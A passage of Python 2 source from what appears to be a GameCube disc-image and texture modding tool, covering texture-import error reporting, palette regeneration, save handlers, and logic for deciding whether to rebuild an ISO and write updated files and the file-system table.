if len( invalidDimensions ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( invalidDimensions[0][0] ) + '" has invalid image dimensions. ' + correctDimensions )
else: compoundImportErrorsMessage += ( '\n\nThe textures below do not have valid dimensions. ' + correctDimensions + '\n\n' + '\n'.join([failedImport[0] for failedImport in invalidDimensions]) )
if invalidMipmapDims:
if len( invalidMipmapDims ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( invalidMipmapDims[0] ) + '" could not be imported because its dimensions '
"don't match the mipmap level you are trying to replace." )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because their dimensions don't match the mipmap levels they are assigned to replace." + \
'\n\n' + '\n'.join( invalidMipmapDims ) )
if invalidImageProperties:
if len( invalidImageProperties ) == 1:
filePath, imageDataOffset, origWidthHeight, origImageType = invalidImageProperties[0]
origWidth, origHeight = origWidthHeight
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( filePath ) + '" could not be imported to replace the texture at ' + imageDataOffset + \
' because it has invalid properties (width, height, or image type). Because there is no image data header in the DAT file '
'for this texture, the new texture to replace it must be {}x{}, with an image type of _{}'.format(origWidth, origHeight, origImageType) )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because they have invalid properties (width, height, or image type) for the "
'specific textures they are meant to replace (they must match the original texture):\n\n' + '\n'.join([failedImport[0] for failedImport in invalidImageProperties]) )
if invalidPaletteProperties:
if len( invalidPaletteProperties ) == 1:
filePath, imageDataOffset, origPaletteType, newPaletteType = invalidPaletteProperties[0]
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( filePath ) + '" could not be imported to replace the texture at ' + imageDataOffset + \
' because it has an invalid palette type. Because there is no image data header in the DAT file '
'for this texture, the new texture to replace it must have an image type of {}, however it had a palette type of {}.'.format(origPaletteType, newPaletteType) )
else: compoundImportErrorsMessage += ( "\n\nThe following textures could not be imported because they have invalid palette types for the "
'specific textures they are meant to replace (they must match the original texture):\n\n' + '\n'.join([failedImport[0] for failedImport in invalidPaletteProperties]) )
if notEnoughSpace:
if len( notEnoughSpace ) == 1: compoundImportErrorsMessage += ( '\n\nAfter conversion, the data for "' + os.path.basename( notEnoughSpace[0][0] ) + '" was too large to '
'replace the texture at ' + notEnoughSpace[0][1] + ". The cause could be the image type (which may be "
'specified in the file name; e.g. the "_3" in "MnSlChr.dat_0x51c0_3"), or that the image has the wrong dimensions.' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because, after conversion, their data was larger than that of the textures they '
'are assigned to replace. The cause could be the image type (which may be specified in the file name; e.g. the "_3" in "MnSlChr.dat_0x51c0_3"), '
'or that the images have the wrong dimensions.\n\n' + '\n'.join([failedImport[0] for failedImport in notEnoughSpace]) )
if paletteRegenerated and warnAboutPaletteRegen:
if len( paletteRegenerated ) == 1: compoundImportErrorsMessage += ( '\n\nThe original color palette in "' + os.path.basename( paletteRegenerated[0] ) + """" was too large for the texture it """ +
"was assigned to replace. So a new palette was generated for it, and the texture was successfully imported. However, this may have slightly altered the texture's colors. "
"(If you'd like to avoid this, create a palette for the texture yourself that does not exceed the max number of colors for this texture.)" )
else: compoundImportErrorsMessage += ( '\n\nThe original color palettes in the files below were too large for the textures they were assigned to replace. So new palettes were '
"generated for them, and they were successfully imported. However, this may have slightly altered the textures' colors. If you'd like to avoid this, create palettes "
"for the textures yourself that do not exceed the max number of colors for each respective texture.)\n\n" + '\n'.join(paletteRegenerated) )
if paletteTooLarge:
if len( paletteTooLarge ) == 1:
filepath, imageDataOffset, curPaletteColorCount, newPaletteColorCount = paletteTooLarge[0]
compoundImportErrorsMessage += ( '\n\nThe color palette in "' + os.path.basename( filepath ) + '" is too large for '
'the texture at "' + imageDataOffset + ". The new texture has " + newPaletteColorCount + " colors in its palette, "
"while the destination file only has space for " + curPaletteColorCount + " colors." )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because their color palettes are larger than those of the textures '
'they are assigned to replace:\n\n' + '\n'.join([failedImport[0] for failedImport in paletteTooLarge]) )
if paletteNotFound:
if len( paletteNotFound ) == 1: compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( paletteNotFound[0] ) + '" could not be imported because '
'the location of the color palette in the destination file could not be found.' )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported because the locations of their color palettes in the destination '
'file(s) could not be found:\n\n' + '\n'.join(paletteNotFound) )
if unknownErrors:
if len( unknownErrors ) == 1:
compoundImportErrorsMessage += ( '\n\n"' + os.path.basename( unknownErrors[0][0] ) + '" could not be imported due to an unknown error.\n\nStatus Code: ' + unknownErrors[0][1] )
else: compoundImportErrorsMessage += ( '\n\nThe following files could not be imported due to unknown errors:\n\n' + '\n'.join([failedImport[0] for failedImport in unknownErrors]) )
# Display the completed error message summary, and prompt to regenerate any invalid palettes.
regeneratePalettes = False
if paletteTooLarge and len( textureFilepaths ) == 1: # This was the only texture that was imported.
if tkMessageBox.askyesno( 'Re-generate Palette?', compoundImportErrorsMessage.lstrip() + '\n\nWould you like to enable the option "Regenerate Invalid Palettes" and attempt to re-import it?' ):
regeneratePalettes = True
else:
cmsg( compoundImportErrorsMessage.lstrip(), 'Import Errors', makeModal=True ) # lstrip will trim leading whitespace if there is any
if paletteTooLarge and tkMessageBox.askyesno( 'Re-generate Palettes?', 'For the texture imports that failed due to invalid palette sizes (having a palette with too many colors), '\
'would you like to enable the option "Regenerate Invalid Palettes" and attempt to re-import them?' ): regeneratePalettes = True
if regeneratePalettes:
global generalBoolSettings
# Turn on the setting to regenerate invalid palettes, and save it (must be saved now,
# because the settings in the menu are refreshed from the file each time the menu is opened)
generalBoolSettings['regenInvalidPalettes'].set( True )
saveSettingsToFile()
# Run the failed imports (those due to their palettes) back through the import functions.
processTextureImports( [failedImport[0] for failedImport in paletteTooLarge], currentlySelectedTab, warnAboutPaletteRegen=False )
else: # All imports successful
if successfulImports == 1: updateProgramStatus( 'Import Successful' )
elif successfulImports > 1: updateProgramStatus( 'Imports Successful' )
warnings = ''
if invalidDimensions:
#if invalidDimensions[0][1]: correctDimensions = 'The dimensions for a game banner should be 96 x 32. '
#else: correctDimensions = 'The width and height for standard textures should not exceed 1024. '
if len( invalidDimensions ) == 1: warnings += ( os.path.basename( invalidDimensions[0][0] ) + '" may have invalid image dimensions. ' + correctDimensions + \
'The texture was still imported successfully, but it might cause problems in-game.' )
else: warnings += ( 'The textures below might not have valid dimensions. ' + correctDimensions + 'The textures were still imported successfully, but ' +
'they might cause problems in-game.\n\n' + '\n'.join([failedImport[0] for failedImport in invalidDimensions]) )
if paletteRegenerated and warnAboutPaletteRegen:
if len( paletteRegenerated ) == 1: warnings += ( '\n\nThe original color palette in "' + os.path.basename( paletteRegenerated[0] ) + """" was too large for the texture it """ +
"was assigned to replace. So a new palette was generated for it, which may have slightly altered the texture's colors. (If you'd like to avoid this, create a palette "
'for the texture yourself that does not exceed the max number of colors for this texture.)', 'Palettes Regenerated' )
else: warnings += ( '\n\nThe original color palettes in the files below were too large for the textures they were assigned to replace. So new palettes were '
"generated for them, which may have slightly altered the textures' colors. (If you'd like to avoid this, create palettes for the textures "
'yourself that do not exceed the max number of colors for each respective texture.)\n\n' + '\n'.join(paletteRegenerated), 'Palettes Regenerated' )
if not warnAboutPaletteRegen: # This means that failed imports due to palette size were re-attempted and [since executing here] successful. Notify that it worked, but others were not re-attempted.
warnings += ( '\n\nThe palette regeneration and texture import was successful. (Any other textures that may have failed the previous import were not re-attempted.)' )
if warnings: cmsg( warnings.lstrip(), 'Warning' ) #todo; the invalidDimensions status on a particular texture will override the paletteRegenerated status; this should be fixed. make status a list?
#============================#
# ~ ~ Saving & Exporting ~ ~ #
#============================#
def saveDiscAs():

	""" Called by the 'Save Disc As...' option. Prompts the user for a filename and location to save a new disc image. """

	# Suggest the currently loaded disc's name and extension in the save dialog
	currentDiscPath = globalDiscDetails['isoFilePath']
	suggestedFileName = os.path.basename( currentDiscPath )
	fileExtension = os.path.splitext( currentDiscPath )[1].replace( '.', '' )

	# Prompt for a place to save the file.
	savePath = tkFileDialog.asksaveasfilename(
		title="Where would you like to export the disc file?",
		initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
		initialfile=suggestedFileName,
		defaultextension=fileExtension,
		filetypes=[('Standard disc image', '*.iso'), ('GameCube disc image', '*.gcm'), ("All files", "*.*")]
	)

	if not savePath: # User canceled the dialog
		return

	# Update the default directory to start in when opening or exporting files.
	settings.set( 'General Settings', 'defaultSearchDirectory', os.path.dirname(savePath) )
	with open( settingsFile, 'w') as theSettingsFile: settings.write( theSettingsFile )

	saveChanges( newDiscPath=savePath )
def saveChanges( newDiscPath='' ):

	""" Saves unsaved changes to the currently loaded DAT or banner file, and/or the disc.

		If the DAT or banner is a standalone file (not loaded from a disc), it will only
		be saved if the user is currently on that tab (DAT Texture Tree tab or Disc Details
		tab, respectively), in which case the disc will not be affected/saved. The disc
		will be saved in all other cases (i.e. no DAT/banner has changes, or they do have
		changes and the file resides in the disc).

		newDiscPath: optional filepath to save the disc to (used by 'Save Disc As...');
					 an empty string means save over/alongside the current disc.
		Returns True/False for whether the save succeeded; stays False when nothing
		needed saving. """

	global unsavedDiscChanges
	saveSuceeded = False # [sic] long-standing misspelling kept; renaming would be a code change
	currentTab = Gui.root.nametowidget( Gui.mainTabFrame.select() )

	# Save the currently loaded DAT's changes first (in case it needs to go into a disc that's waiting to save changes)
	if globalDatFile and globalDatFile.unsavedChanges:
		filepath = globalDatFile.path

		if globalDatFile.source == 'disc': # The file was loaded from the currently loaded disc image.
			# Stage the updated file data in the Disc File Tree; the disc-saving step at the bottom commits it
			iid = filepath.lower()
			_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
			Gui.isoFileTree.item( iid, values=('Updated from DAT tab', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(globalDatFile.getFullData())), tags='changed' )
			unsavedDiscChanges.append( 'Updated data for file ' + isoPath.split('/')[-1] + '.' )
			# saveSuceeded will be dependent on the iso saving step after this in this case, and the program status be updated then as well.

		elif os.path.exists( filepath ):
			if currentTab == Gui.datTab or currentTab == Gui.savTab or currentTab == Gui.mtrTab: # If not on one of these tabs, just go on to saving the banner file and/or disc
				# The DAT is loaded from a standalone file; overwrite that nuhkka!
				saveSuceeded = writeDatFile( filepath, globalDatFile.getFullData(), 'Save', globalDatFile ) # Will handle updating the program status
				return saveSuceeded # Avoiding saving disc too

		else: # Standalone file whose original path has disappeared; cannot save it
			updateProgramStatus( 'Unable to Save' )
			msg( "Unable to find the original DAT file. Be sure that the file path is correct and that the file has not been moved.", 'Unable to Save' )

	# Save the currently loaded banner file's changes (mirrors the DAT logic above)
	if globalBannerFile and globalBannerFile.unsavedChanges:
		filepath = globalBannerFile.path

		if globalBannerFile.source == 'disc': # The file was loaded from the currently loaded disc image.
			# Stage the updated banner data in the Disc File Tree; the disc-saving step below commits it
			iid = filepath.lower()
			_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( iid, 'values' )
			Gui.isoFileTree.item( iid, values=('Updated from Disc Details tab', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(globalBannerFile.data)), tags='changed' )
			unsavedDiscChanges.append( 'Updated data for file ' + isoPath.split('/')[-1] + '.' )
			# saveSuceeded will be dependent on the iso saving step after this in this case, and the program status be updated then as well.

		elif os.path.exists( filepath ):
			if currentTab == Gui.discDetailsTab: # If not on this tab, just go on to saving the disc
				# The file is loaded from a standalone file; overwrite that nuhkka!
				saveSuceeded = writeDatFile( filepath, globalBannerFile.data, 'Save', globalBannerFile ) # Will handle updating the program status
				return saveSuceeded # Avoiding saving disc too

		else: # Standalone banner whose original path has disappeared; cannot save it
			updateProgramStatus( 'Unable to Save' )
			msg( "Unable to find the original banner file. Be sure that the file path is correct and that the file has not been moved.", 'Unable to Save' )

	# Save the ISO's changes
	# NOTE(review): the os.path.isdir check presumably covers 'root folder' (extracted disc) loads — confirm against saveDiscChanges
	if unsavedDiscChanges or os.path.isdir( globalDiscDetails['isoFilePath'] ):
		saveSuceeded = saveDiscChanges( newDiscPath )[0]

	return saveSuceeded
def checkIfDiscNeedsRebuilding( gameId ):
	""" While there are multiple operations which may result in the disc needing to be rebuilt, this one
		scans the files in the Disc File Tree to see if there are any new files, or any modified files
		that are now too big to simply be replaced in the disc's data without needing to move other files.
		It also checks paths to standalone/external files that may be set for importing,
		and alerts the user if there are any that can't be found.

		Returns a tuple of ( needsRebuilding, filesToReplace ), where filesToReplace is a list of
		( targetFileOffset, originalFileSize, isoPath, source, data ) tuples; that list is only
		populated when the disc will NOT be rebuilt (in-place replacement is possible). """

	needsRebuilding = globalDiscDetails['rebuildRequired']

	# Check if there's no FST in the disc (not expected, but you never know)
	if not Gui.isoFileTree.exists( gameId + '/game.toc' ):
		print 'No FST found! The disc will be rebuilt to create it.'
		needsRebuilding = True

	# Get a list of all files to go into the disc
	isoFilesList = getFileTreeFiles()[0] # Returns a list populated by tuples of ( description, entity, isoOffset, fileSize, isoPath, source, data )
	filesToReplace = [] # Only ends up being used if the disc will not be rebuilt
	missingFiles = []

	if needsRebuilding: # No rebuild determination needed. Just check whether external files needed for importing can be found
		# Make sure all external files can be found.
		for iidValues in isoFilesList:
			_, _, isoOffset, fileSize, isoPath, source, data = iidValues
			# For source == 'path', 'data' holds a filepath to a standalone (external) file rather than file data
			if source == 'path' and not os.path.exists( data ): missingFiles.append( data )

	else:
		# Order the list of files from the treeview by their offset
		isoFilesList.sort( key=lambda iidValues: int(iidValues[2], 16) )

		# Check through the files to validate any external file paths, and check whether there is natively enough space for larger files
		for i, iidValues in enumerate( isoFilesList ):
			_, _, isoOffset, fileSize, isoPath, source, data = iidValues

			if source == 'iso': continue # No changes occurring with this file.

			# Get the file size for new or modified files, and check filepaths for external files
			elif source == 'path': # This file is scheduled to be replaced by an external/standalone file
				if not os.path.exists( data ): # 'data' in this case will actually be a filepath to a standalone (external) file
					missingFiles.append( data )
					continue
				elif not needsRebuilding: # Size only matters while a rebuild is still avoidable
					newFileSize = int( os.path.getsize( data ) )
			elif not needsRebuilding: # source == 'ram'; rebuild status still undetermined
				newFileSize = len( data ) / 2 # 'data' is a hex string here; two characters per byte

			# NOTE: needsRebuilding may have flipped to True on an earlier iteration; from then on,
			# the loop only continues in order to validate the remaining external file paths.
			if needsRebuilding: continue # External path checked; nothing else to determine for this file.

			elif isoOffset == '0' and i > 0: # Files beyond the first which have an offset of 0 are new external files being added to the disc
				needsRebuilding = True # No original file in the disc, so a lot of extra space will need to be added
				continue

			# Collect location & size info on the original file to be replaced.
			targetFileOffset = int( isoOffset, 16 )
			originalFileSize = int( fileSize )
			filesToReplace.append( (targetFileOffset, originalFileSize, isoPath, source, data) )

			# Use the above info on this file to decide if rebuilding the ISO is necessary
			if newFileSize != originalFileSize:
				# The user may opt to avoid rebuilding the disc, which can ensure there is always a certain amount of padding between files
				if not generalBoolSettings['avoidRebuildingIso'].get():
					needsRebuilding = True # Guess there's no avoiding it....

				else: # User wishes to avoid rebuilding. Let's see if that can be arranged.
					# A larger final file can always grow into the end of the disc, so only non-final files matter here
					if newFileSize > originalFileSize and i + 1 != len( isoFilesList ):
						# Check whether there is currently enough space for the new file anyway, thanks to padding.
						if isoPath.split('/')[-1].lower() == 'start.dol':
							# Special case; will be considered together with the FST (since the latter must immediately follow the DOL, yet is itself movable)
							nextEntryOffset = int( isoFilesList[ i + 2 ][2], 16 ) # Offset of the file following the FST
							newFileSize += int( isoFilesList[ i + 1 ][3] ) # Should be the FST's file size
							#print 'considering DOL import. nextEntryOffset:', hex(nextEntryOffset), 'combined file size:', hex(newFileSize)
						else:
							nextEntryOffset = int( isoFilesList[ i + 1 ][2], 16 )

						if nextEntryOffset == 0: # Makes sure the next file to pull an offset from isn't a new file
							needsRebuilding = True
						else:
							spareSpaceAfterImport = nextEntryOffset - targetFileOffset - newFileSize
							#print 'spare space between files (with new file):', hex( spareSpaceAfterImport )
							if spareSpaceAfterImport < 0: needsRebuilding = True

	if missingFiles:
		cmsg( 'These files could not be located for importing:\n\n' + '\n'.join( missingFiles ) )

	# Remember the determination so later operations don't have to re-scan
	globalDiscDetails['rebuildRequired'] = needsRebuilding

	return needsRebuilding, filesToReplace
def saveDiscChanges( newDiscPath='' ):
""" Saves all changed files in an ISO to disc; either by replacing each file in-place
(and updating the FST) or rebuilding the whole disc. """
global unsavedDiscChanges
discFilePath = os.path.normpath( globalDiscDetails['isoFilePath'] )
fileWriteSuccessful = False
filesReplaced = [] # The following three lists will be of iids
filesAdded = []
filesUpdated = []
# Verify the path to the disc.
if not os.path.exists( discFilePath ):
updateProgramStatus( 'Disc Not Found' )
msg( 'There was a problem attemtping to save the disc changes. Possibly due to the file being deleted or moved.', 'Disc Not Found' )
return False, 0, 0
if isRootFolder( discFilePath )[0]: buildingFromRootFolder = True
else: buildingFromRootFolder = False
discExtOriginal = os.path.splitext( discFilePath )[1] # Inlucdes dot ('.')
discExt = discExtOriginal[1:].upper() # Removes the '.' as well
gameId = globalDiscDetails['gameId'].lower()
needsRebuilding, filesToReplace = checkIfDiscNeedsRebuilding( gameId )
# Ensure there is work to be done
if not needsRebuilding and not filesToReplace:
# If this occurs, there are probably external files to be imported that are missing (in which case the user has been notified)
cmsg( 'The following changes are still present and have not been saved to the disc:\n\n' + '\n'.join(unsavedDiscChanges) )
return False, [], []
elif needsRebuilding and 'Offset' in Gui.isoFileTree.heading( '#0', 'text' ):
msg( 'The disc cannot be rebuilt while\nthe files are sorted in this way.' )
return False, [], []
chunkSize = 4194304 # 4 MB. This is the chunk size that will be copied from ISO to ISO during the rebuild process.
guiUpdateInterval = 8388608 # 8 MB. Once this many bytes or more have been copied to the new disc, the gui should update the progress display
originalIsoBinary = None
backupFile = None
def getInChunks( sourceFile, offset, fileSize, chunkSize ):
""" Generator to get a file (from a specific offset) piece by piece. (Saves greatly on memory usage) """
sourceFile.seek( offset )
bytesCopied = 0
while True:
if bytesCopied + chunkSize >= fileSize:
remainingDataLength = fileSize - bytesCopied
yield sourceFile.read( remainingDataLength )
break # Ends this generator (conveys that it is exhausted).
else:
bytesCopied += chunkSize
yield sourceFile.read( chunkSize ) # Come back to this function for the next chunk of data after this.
# Check whether all system files are present and accounted for, and what boot file nomenclature/division is used
gcrSystemFiles = False
missingSystemFiles = False
for systemFile in [ '/boot.bin', '/bi2.bin', '/apploader.ldr', '/start.dol' ]:
systemFileIid = gameId + systemFile
if not Gui.isoFileTree.exists( systemFileIid ) and systemFile.endswith( '.bin' ):
if Gui.isoFileTree.exists( gameId + '/iso.hdr' ): # It's ok if boot.bin & bi2.bin don't exist if iso.hdr is available in their place
gcrSystemFiles = True
continue
missingSystemFiles = True
break
# Verify all required system files are present and accounted for before continuing.
if needsRebuilding and missingSystemFiles:
msg( 'A system file, ' + systemFileIid + ', could not be found. Cannot rebuild the ' + discExt + '.' )
return False, 0, 0
# Determine the location of the FST from the header file loaded in the GUI (may be new and not yet match the disc)
if gcrSystemFiles: headerFileData = getFileDataFromDiscTreeAsBytes( gameId + '/iso.hdr' )
else: headerFileData = getFileDataFromDiscTreeAsBytes( gameId + '/boot.bin' )
dolOffset = toInt( headerFileData[0x420:0x424] )
dolFileSize = getFileSizeFromDiscTree( gameId + '/start.dol' )
if dolFileSize == 0: return # Failsafe (DOL could have been external, and moved by user)
fstOffset = dolOffset + dolFileSize
# Write the file(s) to the ISO.
if not needsRebuilding:
def updateFstEntry( entries, targetFileOffset, newFileSize ):
for i, entry in enumerate( entries ):
if entry[:2] == '01': continue # Checks the directory flag to skip folders
entryOffset = int( entry[8:16], 16 )
# Update this entry with the new file length
if entryOffset == targetFileOffset:
entries[i] = entries[i][:-8] + "{0:0{1}X}".format( int(newFileSize), 8 )
break
systemFiles = [ 'boot.bin', 'bi2.bin', 'apploader.ldr', 'game.toc', 'iso.hdr', 'start.dol' ]
fstContentsUpdated = False
fstLocationUpdated = False
# Retrieve and parse the existing FST/TOC (File System Table/Table of Contents).
fstData = getFileDataFromDiscTree( gameId + '/game.toc' )
_, entries, strings = readFST( fstData ) # Returns an int and two lists
# Create a copy of the file and operate on that instead if using the 'Save Disc As' option
if newDiscPath:
try:
origFileSize = int( os.path.getsize(discFilePath) )
dataCopiedSinceLastUpdate = 0
with open( newDiscPath, 'wb' ) as newFile:
with open( discFilePath, 'rb' ) as originalFile:
for dataChunk in getInChunks( originalFile, 0, origFileSize, chunkSize ):
newFile.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
if dataCopiedSinceLastUpdate > guiUpdateInterval:
updateProgramStatus( 'Copying ' + discExt + ' (' + str( round( (float(newFile.tell()) / origFileSize) * 100, 1 ) ) + '%)' )
Gui.programStatusLabel.update()
dataCopiedSinceLastUpdate = 0
discFilePath = newDiscPath
except:
msg( 'The file to replace could not be overwritten.\n\n'
"This can happen if the file is locked for editing (for example, if it's open in another program)." )
return False, 0, 0
# Save each file to the ISO directly, modifying the FST if required. Only FST file lengths may need to be updated.
try:
with open( discFilePath, 'r+b') as isoBinary:
importIndex = 1
for targetFileOffset, originalFileSize, isoPath, source, data in filesToReplace:
thisFileName = isoPath.split('/')[-1].lower()
padding = ''
# Update the GUI's progress display.
if len( filesToReplace ) > 1:
updateProgramStatus( 'Importing file ' + str(importIndex) + ' of ' + str(len( filesToReplace )) )
Gui.programStatusLabel.update()
importIndex += 1
# Collect location & size info on the original file to be replaced.
if source == 'path': newFileSize = int( os.path.getsize(data) )
else: newFileSize = len( data ) / 2 # source = 'ram'; there cannot be cases of source='iso' here
# Update this file entry's size value in the FST if it's different.
if newFileSize != originalFileSize:
if thisFileName in systemFiles: # This file isn't in the FST. A value in the disc's header may need to be updated.
if thisFileName == 'start.dol':
# Move the FST. It must directly follow the DOL as its offset is the only indicator of the DOL file's size
isoBinary.seek( 0x424 )
isoBinary.write( toBytes( fstOffset ) )
fstLocationUpdated = True
# If this file is the FST, its size also needs to be updated in boot.bin
elif thisFileName == 'game.toc':
isoBinary.seek( 0x428 )
newFstSizeByteArray = toBytes( newFileSize )
isoBinary.write( newFstSizeByteArray ) # Writes the value for FST size
isoBinary.write( newFstSizeByteArray ) # Writes the value for max FST size (differs from above for multi-disc games?)
if thisFileName == 'start.dol' or thisFileName == 'game.toc':
# Remember that the header file was updated
if gcrSystemFiles: filesUpdated.append( gameId + '/iso.hdr' )
else: filesUpdated.append( gameId + '/boot.bin' )
else: # The file's size value needs to be updated in the FST
updateFstEntry( entries, targetFileOffset, newFileSize )
fstContentsUpdated = True
# Prepare some padding of zeros to go after the file, to remove any traces of the old file.
if newFileSize < originalFileSize:
padding = '00' * (originalFileSize - newFileSize)
# Write the new file (and trailing padding if needed) to the ISO
isoBinary.seek( targetFileOffset )
if source == 'ram':
isoBinary.write( bytearray.fromhex(data) )
else:
with open( data, 'rb' ) as externalFile: # fileData is actually a file path in this case.
for dataChunk in getInChunks( externalFile, 0, newFileSize, chunkSize ):
isoBinary.write( dataChunk )
isoBinary.write( bytearray.fromhex(padding) )
filesReplaced.append( isoPath.lower() )
if fstLocationUpdated or fstContentsUpdated:
# Reassemble the FST and write it back into the game
updatedFstData = ''.join( entries ) + '\x00'.join( strings ).encode('hex')
isoBinary.seek( fstOffset )
isoBinary.write( bytearray.fromhex(updatedFstData) )
if fstContentsUpdated: filesUpdated.append( gameId + '/game.toc' )
fileWriteSuccessful = True
except Exception as e:
print 'Error saving changes to disc (rebuild required = False);', e
else: # Build a new image, based on the folders and files in the GUI.
dataCopiedSinceLastUpdate = 0
#tic = time.clock() # for performance testing
# Generate a new FST based on the files shown in the GUI
newFstData = generateFST()
newNumberOfEntries, newEntries, newStrings = readFST( newFstData ) # Returns an int and two lists
try:
if buildingFromRootFolder: # This is a root folder that needs to be built into a disc image
# Try to get the shortTitle, for use as a default file name
if globalBannerFile:
if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.
defaultDiscName = globalBannerFile.data[0x1820:(0x1820 + 0x20)].decode(encoding) + '.iso'
else:
defaultDiscName = gameId.upper() + '.iso'
# Prompt for a place to save the file, and a filename.
savePath = tkFileDialog.asksaveasfilename(
title="Choose a destination and file name to save these files as a new disc image.",
initialdir=settings.get( 'General Settings', 'defaultSearchDirectory' ),
initialfile=defaultDiscName,
defaultextension='.iso',
filetypes=[('Standard disc image', '*.iso'), ('GameCube disc image', '*.gcm'), ("All files", "*.*")])
if not savePath: return False, 0, 0
else: originalIsoBinary = open( discFilePath, 'rb' ) # Will only be reference when rebuilding an existing disc image.
def updateProgressDisplay( dataCopiedSinceLastUpdate ):
if dataCopiedSinceLastUpdate > guiUpdateInterval:
updateProgramStatus( 'Rebuilding ' + discExt + ' (' + str( round( (float(newIsoBinary.tell()) / projectedDiscSize) * 100, 1 ) ) + '%)' )
Gui.programStatusLabel.update()
return 0
else: return dataCopiedSinceLastUpdate
# Determine how much padding to add between files
fstFileSize = len( newFstData )/2
spaceForHeaderAndSystemFiles = fstOffset + roundTo32( fstFileSize, base=4 )
totalNonSystemFiles = 0
totalNonSystemFileSpace = 0
for entry in newEntries:
if entry[:2] == '00': # Means it's a file
totalNonSystemFiles += 1
thisEntryFileSize = int( entry[16:24], 16 )
totalNonSystemFileSpace += roundTo32( thisEntryFileSize, base=4 )
interFilePaddingLength = getInterFilePaddingLength( totalNonSystemFiles, spaceForHeaderAndSystemFiles + totalNonSystemFileSpace )
paddingSettingsValue = settings.get( 'General Settings', 'paddingBetweenFiles' ).lower()
# Create a new file to begin writing the new disc to, and calculate the size it will be expected to reach
backupFile = tempfile.NamedTemporaryFile( dir=os.path.dirname(discFilePath), suffix='.tmp', delete=False )
if buildingFromRootFolder and paddingSettingsValue == 'auto': projectedDiscSize = 1459978240
else: projectedDiscSize = spaceForHeaderAndSystemFiles + totalNonSystemFileSpace + totalNonSystemFiles * interFilePaddingLength
with open( backupFile.name, 'r+b' ) as newIsoBinary: # File opened in read/write binary mode
# Write the new ISO's system files
for systemFile in [ '/boot.bin', '/bi2.bin', '/apploader.ldr', '/start.dol' ]:
if gcrSystemFiles and systemFile == '/boot.bin': continue # Skip this and the next file in trade for iso.hdr if it is present.
elif gcrSystemFiles and systemFile == '/bi2.bin': systemFile = '/iso.hdr'
# Gather info on the source and destination for this file
iid = gameId + systemFile
description, entity, isoOffset, origFileSize, isoPath, source, data = Gui.isoFileTree.item( iid, 'values' )
thisFileOffset = int( isoOffset, 16 )
# Add padding prior to the file, if needed (likely shouldn't be though), to preserve offsets
currentFilePosition = newIsoBinary.tell()
if currentFilePosition < thisFileOffset:
sysFilePadding = '00' * ( thisFileOffset - currentFilePosition )
newIsoBinary.write( bytearray.fromhex(sysFilePadding) )
# Determine if this is a file being imported, or if it will be copied from the original ISO
if source == 'path': # In this case, the source is an external file.
newFileSize = os.path.getsize( data ) # data is a file path in this case
with open( data, 'rb' ) as newSystemFile:
# Write the file to the ISO in chunks (and update the status display)
for dataChunk in getInChunks( newSystemFile, 0, newFileSize, chunkSize ):
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
elif source == 'ram': # The data for this file is already loaded in the data variable, as a hex string
dataChunk = bytearray.fromhex( data )
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
else: # This file was not found in the files being imported (source == 'iso'). Use the system file from the original ISO.
originalIsoBinary.seek( thisFileOffset )
dataChunk = originalIsoBinary.read( int(origFileSize) )
newIsoBinary.write( dataChunk )
dataCopiedSinceLastUpdate += len( dataChunk )
# This may take a while. Update the GUI's progress display.
dataCopiedSinceLastUpdate = updateProgressDisplay( dataCopiedSinceLastUpdate )
if source != 'iso':
filesReplaced.append( isoPath.lower() )
# Prepare space for the FST. Add padding between it and the DOL (last file above) if needed, and create space where the full FST will later be placed.
currentFilePosition = newIsoBinary.tell()
fstPlaceholderPadding = '00' * ( fstOffset + fstFileSize - currentFilePosition )
newIsoBinary.write( bytearray.fromhex(fstPlaceholderPadding) )
# Write the new ISO's main file structure # Entry composition in the following loop, for both files and folders:
lowercaseIsoPath = gameId # gameId already lower case directoryFlag (1 byte) + stringTableOffset + hierarchicalOffset + length
dirEndIndexes = [newNumberOfEntries]
for index, entry in enumerate( newEntries[1:], start=1 ): # skips the root entry
# If the last directory being added to has been finished, remove the last directory from lowercaseIsoPath
while index == dirEndIndexes[-1]:
lowercaseIsoPath = '/'.join( lowercaseIsoPath.split('/')[:-1] )
dirEndIndexes.pop()
if entry[:2] == '01': # This entry is a folder (== 00 for a file)
lowercaseIsoPath += '/' + newStrings[ index - 1 ].lower()
# Remember how many entries are in this folder, so when that number is reached, that dirictory can be removed from lowercaseIsoPath
entryLength = int( entry[16:24], 16 )
dirEndIndexes.append( entryLength )
else:
# Add padding before this file, while ensuring that the file will be aligned to 4 bytes.
currentFilePosition = newIsoBinary.tell()
alignmentAdjustment = roundTo32( currentFilePosition, base=4 ) - currentFilePosition # i.e. how many bytes away from being aligned.
interFilePadding = '00' * ( alignmentAdjustment + interFilePaddingLength )
newIsoBinary.write( bytearray.fromhex(interFilePadding) )
#newEntries[ index ] = entry[:8] + "{0:0{1}X}".format( newIsoBinary.tell(), 8 ) + entry[16:24]
newEntryOffset = "{0:0{1}X}".format( newIsoBinary.tell(), 8 )
# Check if this file is to be copied to the new ISO from the original disc (when rebuilding an existing image), or will be replaced by one of the new files.
